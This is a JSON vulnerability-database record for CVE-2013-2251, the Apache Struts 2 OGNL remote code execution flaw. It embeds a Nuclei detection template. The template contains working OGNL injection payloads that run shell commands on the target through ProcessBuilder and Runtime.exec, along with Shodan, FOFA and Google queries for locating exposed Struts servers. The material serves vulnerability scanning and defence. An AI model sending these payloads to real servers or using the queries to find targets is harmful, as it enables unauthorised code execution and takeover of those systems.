{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2013-2251/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2013-2251/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2013-2251/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2013-2251/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2013-2251/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2013-2251"},"sightings":{"href":"/api/v1/sightings/cve-2013-2251"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.99998,"kev":true,"percentile":0.9999},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2013/CVE-2013-2251.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2013-2251\n\ninfo:\n  name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution\n  author: exploitation,dwisiswant0,alex\n  severity: critical\n  description: In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\", or \"redirectAction:\" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code.\n  impact: |\n    This vulnerability can lead to remote code execution, allowing attackers to take control of the affected system.\n  remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.\n  reference:\n    - http://struts.apache.org/release/2.3.x/docs/s2-016.html\n    - https://cwiki.apache.org/confluence/display/WW/S2-016\n    - https://nvd.nist.gov/vuln/detail/CVE-2013-2251\n    - http://archiva.apache.org/security.html\n    - http://cxsecurity.com/issue/WLB-2014010087\n  classification:\n    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C\n    cvss-score: 9.3\n    cve-id: CVE-2013-2251\n    cwe-id: CWE-20\n    epss-score: 0.99998\n    epss-percentile: 0.9999\n    cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*\n  metadata:\n    max-request: 9\n    vendor: apache\n    product: struts\n    shodan-query:\n      - http.html:\"apache struts\"\n      - http.title:\"struts2 showcase\"\n      - http.html:\"struts problem report\"\n    fofa-query:\n      - body=\"struts problem report\"\n      - title=\"struts2 showcase\"\n      - body=\"apache struts\"\n    google-query: intitle:\"struts2 showcase\"\n  tags: cve2013,cve,rce,struts,apache,ognl,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n      - |\n        GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n      - |\n        GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n\n    payloads:\n      params:\n        - \"redirect\"\n        - \"action\"\n        - \"redirectAction\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"((u|g)id|groups)=[0-9]{1,4}\\\\([a-z0-9]+\\\\)\"\n\n      - type: status\n        status:\n          - 200\n          - 400\n        condition: or\n# digest: 4b0a00483046022100a2f60aea1385aeadc4cfdf73821b24f68b8b8ee427d2bbf0280c5dabda0f9b11022100e47cbcdd538798f2a82fdcccf37a2a4d2aaf5a4fb1f2ec9c91c397db31355a3d:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2013-2251"}